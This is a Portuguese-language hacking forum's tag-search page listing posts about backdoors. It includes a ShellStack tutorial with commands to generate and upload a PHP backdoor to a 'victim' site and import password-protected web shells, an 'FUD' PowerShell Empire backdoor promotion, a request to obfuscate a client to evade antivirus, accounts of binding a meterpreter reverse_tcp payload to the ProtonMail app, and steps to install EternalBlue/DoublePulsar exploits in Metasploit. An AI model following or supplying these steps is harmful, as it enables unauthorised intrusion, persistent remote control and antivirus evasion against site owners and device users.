Ir para conteúdo

Pesquisar na Comunidade

Mostrando resultados para as tags ''backdoor''



Mais opções de pesquisa

  • Pesquisar por Tags

    Digite tags separadas por vírgulas
  • Pesquisar por Autor

Tipo de Conteúdo


Fóruns

  • Fsociety Brasil
    • Quadro de Avisos
    • Destaques
    • Sugestões
    • Apresentação de Membros
    • Desafios
  • Desenvolvimento
    • Ferramentas
    • Projetos
    • Dúvidas
    • Fsociety Brasil
    • Tutoriais
  • Segurança da Informação (hacking)
    • Dúvidas e Discussões
    • Tutoriais
    • Cursos, Apostilas e Livros
    • SEO - Black Hat / White Hat
    • Sites Úteis
    • Vídeos
    • Mobile
  • Cracking
    • Cracker para programas
    • Brute-force
    • Leaks
    • Tutoriais cracking
    • Utilidades
  • Sistemas Operacionais (S.O)
    • Linux
    • Windows
    • Mac
  • Hardware
    • Cursos, apostilas e livros
    • Dúvidas e discussões
    • Arduino
    • Raspberry
  • Software
    • Cursos, apostilas e livros
    • Dúvidas e discussões
  • Games, emuladores, crack, cheater e afins
    • PC
    • Consoles
    • Outros
  • Tecnologia em geral
    • Dúvidas e discussões
    • Sites Úteis
    • Cursos, apostilas e livros
    • Tutoriais
  • Engenharia Social
    • Tutoriais
    • Material, Apostila, Livros, etc.
    • Dicas e discussões
  • Off-Topic
    • Inglês
    • Cursos, apostilas e livros
    • Dúvidas e Discussões
    • Ciência e Tecnologia
    • Notícias, novidades e acontecimentos
    • Sociologia e filosofia
    • Teorias de conspiração
    • Off-Off

Encontrado 8 registros

  1. ShellStack - Ferramenta baseada em PHP

    Uma ferramenta baseada em PHP que ajuda você a gerenciar todos os seus sites Backdoored de forma eficiente. O ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "HACKERS" que desejam manter uma faixa de cada site que eles cortaram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar o URL de backdoor no shells.txt presente no diretório da ferramenta. Com ShellStack você pode Importar shells PHP Obter detalhes do servidor Carregar arquivos do seu sistema usando seu terminal E acima de tudo, você pode gerenciar suas portas traseiras de forma eficiente Como usar git clone https://github.com/Tuhinshubhra/shellstack cd shellstack php shellstack.php generatebd saia utilizando CTRL + C Isso gerará um arquivo de backdoor no mesmo diretório que a ferramenta em um arquivo chamado backdoor.php Carregue o arquivo Backdoor para o site da Vítima Copie o URL do Backdoor e cole-o no arquivo shells.txt presente no diretório da ferramenta e salve-o ( Cada backdoor está separado por uma nova linha ) php shellstack.php Digite o número de série atribuído ao Backdoor O resto é bastante auto-explicativo Veja o vídeo aqui: Requisitos php curl Exemplo [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# php shellstack.php ________________________________________________________________________________ _______ _ _ _______ _______ _______ _______ _______ _ _ |______ |_____| |______ | | |______ | |_____| | |____/ ______| | | |______ |_____ |_____ ______| | | | |_____ | \_ ________________________________________________________________________________ Simple Backdoor Management System Coded By R3D#@x0R_2H1N A.K.A Tuhinshubhra Shout Out: LulZSec India ================================================================================ List Of Backdoors: 0. http://localhost/backdoor.php ============================================= [#] Enter Either Of These (Backdoor No.|help|generatebd) : 0 [+] Shell Selected: http://localhost/backdoor.php [+] Validating Backdoor: Backdoor Found! List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):2 [+] Server Info [i] Sending Request And Getting Response... [i] Server: Linux R3D_MACH1N3 4.9.0-kali4-amd64 #1 SMP Debian 4.9.30-1kali1 (2017-06-06) x86_64 [i] Server IP: 127.0.0.1 Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):1 List Of Shells =============== [1] Dhanush shell {User & Pass : shellstack123} [2] B374K shell {Pass : shellstack123} [3] Kurama shell V.1.0 {Pass : red} [4] WSO shell {Pass : shellstack123} [5] MiNi shell {User & Pass : shellstack123} [#] Select Shell To Import(1-5):1 [i] Importing Shell... [i] Sending Request And Getting Response... [R] Dhanush Shell Imported Successfully To /var/www/html/dhanush.php Press Enter To Continue List Of Actions ================ [1] Import PHP Shells [2] Server Details [3] Remove Backdoor [4] Remote File Upload [5] Exit [#] Select Option(1|2|3|4|5):5 [email protected]_MACH1N3:/home/redhaxor/Desktop/shellstack# Versão Versão 1.0 Screenshot Tutorial retirado do site: http://www.kitploit.com
  2. POWERSHELL EMPIRE - Criando backdoor 100% FUD

    Eae pessoal, hoje trago à vocês, um vídeo ensinando a fazer uma backdoor 100% FUD com o script Powershell Empire.
  3. Olá galera, Seguinte, não sei se sou muito burro ou a maioria tem o mesmo problema que eu... Sempre tive problema com antivírus, por esse motivo pensei em desenvolver um Cliente básico em Python usando Socket e tals. Até ai tudo bem, fiz normal, usei o Pyintaller e NoDistribute acusou 1 só. Executei e fui pego... Obviamente devo esconder esse código. Ai vem a minha dúvida, como ofuscar isso ? Quais passos devo seguir ? Se me disser que devo procurar saber sobre criptografia, ok... Mas como adicionar isso ao código? Sei que muita gente aqui sabe bem o que fazer... Espero mesmo que me ajudem. Obrigado povo !
  4. Me ajudem Pf

    Me ajudem Por Favor. Eu uso o Kali Linux por Live USB, e recentemente meu navegador não esta funcionando, quando eu entro pra pesquisar em qualquer site aparece "não foi possível estabelecer conexão segura " e estou conectado a internet. E não é só o navegador, quando vou criar uma backdoor pelo Metasploit da problema na criação. O que posso fazer para arrumar esse problema ?
  5. ShellStack - Uma ferramenta em PHP que ajuda você a administrar todas as suas backdoors em sites de modo eficiente ShellStack é uma ferramenta de gerenciamento de backdoor baseada em PHP. Esta ferramenta é útil para "hackers" que desejam manter seu vestígio/faixa que eles invadiram. A ferramenta gera um arquivo de backdoor que você só precisa carregar no site e colocar a URL da backdoor no shells.txt presente no diretório da ferramenta.
  6. É assim, criei uma backdoor de rede local com Backdoor APK e vinculei a backdoor com o app do Protonmail, seto tudo que deve ser (android/meterpreter/reverse_tcp [....]) dou o Exploit -j -z quando abre o App, tudo ok, jogo a persistência e executo, tudo ok, mas quando fecho o App do Protonmail, ele perde Conexão com o Metasploit, ao abrir ele volta funcionar perfeitamente, como posso resolver isso ? Visto que não dá para migrar processo no backdoor de android. Prints:
  7. Mais ferramentas no backdoor?

    Olá, recentemente comecei a usar backdoor's (tanto em windows quanto em android), e atualmente uso o metasploit para fazer o backdoor, e uso o payload windows(ou andoird)/meterpreter/reverse_tcp Antigamente, eu usava trojans, mas decidi migrar pro backdoor, e uma diferença que notei diretamente, é que os trojans tem mais ferramentas do que os backdoor's, existe alguma forma de aumentar a quantidade de ferramentas que um backdoor pode ter? Desculpe qualquer noobise....
  8. Opa pessoal, é meu primeiro tópico aqui no forum, então desculpa qualquer coisa Galera, esse tutorial vai ser dividido em 2 partes, essa primeira parte é onde você vai adicionar tudo que é preciso pra explorar a falha... Recentemente, algumas ferramentas da NSA foram vazada por um grupo de hackers denominados The Shadow Brokers, entre elas estão dois exploits voltado para sistemas Windows, o primeiro denominado Eternalbue e o segundo DoublePulsar . O Eternalblue explora uma vulnerabilidade de execução remota de código nos protocolos SMBv1 e NBT sobre as portas TCP 445 e 139 respectivamente. Já o DoublePulsar é usado para injetar arquivos DLL's juntamente com um payload. Até agora as versões que são afetadas pelo exploit... 1 Windows XP (all services pack) (x86) (x64) 2 Windows Server 2003 SP0 (x86) 3 Windows Server 2003 SP1/SP2 (x86) 4 Windows Server 2003 (x64) 5 Windows Vista (x86) 6 Windows Vista (x64) 7 Windows Server 2008 (x86) 8 Windows Server 2008 R2 (x86) (x64) 9 Windows 7 (all services pack) (x86) (x64) Bom, hoje venho trazer pra vocês um tutorial pra adicionar os exploits ao Metasploit... Então vamos lá.... .: Requisitos :. Metasploit Wget Git .: Adicionando os exploits no Metasploit :. 1. Primeiramente vamos ter que adicionar os 2 exploits ao Metasploit e um módulo auxiliar, é rápido e facil... Segue aí 1.1 Vamos baixar primeiramente o módulo auxiliar que vai nos ajudar a verificar se o nosso alvo é vulnerável ao MS17-010 e adicioná-lo ao nosso Metasploit. wget https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb 1.2 Depois de baixado o arquivo, você deverá movê-lo para a pasta /modules/auxiliary/scanner/smb/ no caminho de instalação do seu metasploit... No meu sistema ele se encontra em /opt/metasploit/, no meu caso vai ficar dessa forma... # mv smb_ms17-010.rb /opt/metasploit/modules/auxiliary/scanner/smb/ 1.3 Agora vamos baixar os exploits \o/!!!! git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git 1.4 Depois de baixado o repositório, vamos colocar os arquivos dos exploits no nosso querido metasploit . Para adicionar é o mesmo processo anterior, só que vamos mudar apenas o caminho que será agora /modules/exploits/windows/smb/ OBS: Vamos copiar apenas o eternalblue_doublepulsar.rb e a pasta deps # cd Eternalblue-Doublepulsar-Metasploit # mv deps eternalblue_doublepulsar.rb /opt/metasploit/modules/exploits/windows/smb/ Finish!!! Já está tudo pronto para a próxima fase UHUUUUUUUUU \o/ Por Hoje é só galera, no próximo post irei ensinar a vocês a explorar a falha... Abraço !!!!
×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.